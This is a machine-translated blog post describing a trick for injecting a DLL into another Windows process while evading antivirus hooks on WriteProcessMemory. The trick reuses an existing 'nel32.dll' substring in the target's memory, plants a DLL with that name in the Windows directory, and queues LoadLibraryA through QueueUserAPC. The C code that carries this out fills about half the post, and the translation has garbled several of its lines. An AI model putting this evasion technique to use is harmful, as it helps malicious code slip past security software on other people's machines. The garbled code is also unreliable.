Most of the killed are soft hook NtWriteVirtualMemory and NtUserSetWindowsHookAW, NtUserSetWindowsHookE to prevent code injection.
The method of on Ring3 code injection layer include:
l remote thread CreateRemoteThread
l message hook SetWindowsHookEx
the Ring3 APC QueueUserAPC
l modify thread context SetContextThread
Wherein the first and third approaches need to pass a param, but this requires param must target process memory space, some of the previous methods cumbersome, directly in the target process VirtualAllocEx memory, and then write the contents of the desired parameter memory used WriteProcessMemory function, and this function is hook, so you can easily kill soft interception code injection behavior.
Think about it, kill this defense is very soft failure! The reason is that in order to be a param, the attacker did not need to make such a drastic move to the target process memory space for memory and write memory, I think if you can not WriteProcessMemory function? Anyway, my aim is to get a reasonable param, param and this is the target process memory space can be!
After thinking, original everything is so easy ah, ha ha! I laughed for a long time ~ ~ ~
For example: Suppose I is injected:
QueueUserAPC ((PAPCFUNC) LoadLibraryA, hThread (ULONG_PTR) param);
I want the contents of the above param is a "xxx.dll", on it, and this param is required in the target process memory space
You think of it? Haha
The answer: the target process directly in a search string like "nel32.dll" can be friends! Because "kernel32.dll" This string must exist, and then to "kernel32.dll" is not the same, it would not use it "nel32.dll", or "el32.dll", are possible ah! Finally, to put down into the windows directory under a nel32.dll, so inject soft kill most are not intercepted! Haha!
Wrote a section of the program, made a test, only a test the next trend, bypassing perfect! In fact kill soft test later. . .
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
////////////////////////////////////////////////// ////////////////////////
// do not write the target process memory
// directly in the target process to search out such a string and injected nel32.dll
////////////////////////////////////////////////// ////////////////////////
int bufflen = 30000;
char * Buffer = (char *) the malloc (the sizeof (char) * bufflen);
DWORD dwNumberOfBytesRead;
defaultAddress DWORD;
// get the base address of the process
HANDLE hSnapshot = the CreateToolhelp32Snapshot (TH32CS_SNAPMODULE, dwProcessId);
IF (hSnapshot!)
{
the printf ( "the CreateToolhelp32Snapshot error \ n-!");
return 0;
}
the MODULEENTRY32 the sizeof Me = {(Me) };
BOOL FOK = Module32First (hSnapshot, & Me);
(! FOK) IF
{
the printf ( "! Module32First error \ n-");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %s\n",processName,me.szModule);
// 取得进程模块基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08X\n",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!\n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %s\n",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL到指定进程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%d\n", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
}